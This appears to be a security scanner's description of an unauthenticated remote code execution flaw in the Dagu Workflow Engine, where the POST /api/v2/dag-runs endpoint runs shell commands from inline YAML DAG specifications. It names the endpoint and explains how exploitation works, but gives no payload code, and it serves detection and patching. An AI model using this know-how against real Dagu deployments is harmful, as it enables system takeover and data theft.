Dagu Workflow Engine Remote Code Execution Scanner

The Dagu Workflow Engine is a tool used to schedule and manage complex workflows for automation processes. It is utilized by developers and IT professionals in environments where task automation and workflow management are essential, such as software development and operations teams. By accepting and executing dynamic task sequences defined in YAML, it enables efficient handling of routine tasks. Dagu is particularly appealing in DevOps settings, where continuous integration and delivery pipelines are maintained. However, versions 1.30.3 ship with authentication disabled by default, which presents a risk of unauthorized access. Its ease of integration into diverse environments makes it a popular choice, thereby increasing the importance of securing its deployments.

The vulnerability exists in the Dagu Workflow Engine due to unsecured default settings that facilitate Remote Code Execution (RCE). This vulnerability allows unauthorized users to execute arbitrary shell commands via the specified API endpoint without needing any form of authentication. Such a flaw poses a critical security risk, as it can be exploited remotely over the network with minimal effort. The endpoint in question, POST /api/v2/dag-runs, fails to validate user inputs adequately, leading to the execution of untrusted code. The problem is exacerbated by the fact that Dagu accepts inline YAML DAG specifications, which are immediately processed. Immediate execution of commands without proper safeguarding measures underscores the severity of the vulnerability.

The vulnerability lies in the `/api/v2/dag-runs` endpoint, which processes HTTP POST requests designed to accept YAML DAG specifications. The endpoint lacks proper authentication routines, thus any external entity with access to the interface can exploit this by sending specially crafted payloads. The payloads typically include steps defining shell commands to be executed, as demonstrated by the template which writes data to a remote server. A condition for successful exploitation is that the server is reachable via network paths to the attacker, making external command execution feasible. Misconfigured Dagu installations that inadvertently expose this API endpoint are particularly susceptible.

Exploitation of this vulnerability can have severe consequences, ranging from unauthorized data retrieval to complete takeover of the affected system. Attackers can deploy malware or ransomware, pivot to internal networks, exfiltrate sensitive data, or interrupt services by exceeding resource consumption limits. System integrity can be severely compromised if attackers manipulate workflow tasks to execute malicious code. Hence, there is an imperative for administrators to address this security flaw to prevent unauthorized system access and potential data breaches.

REFERENCES

• https://github.com/dagu-org/dagu
• https://vulnerabletarget.com/vt-dagu
• https://github.com/advisories/GHSA-6qr9-g2xw-cw92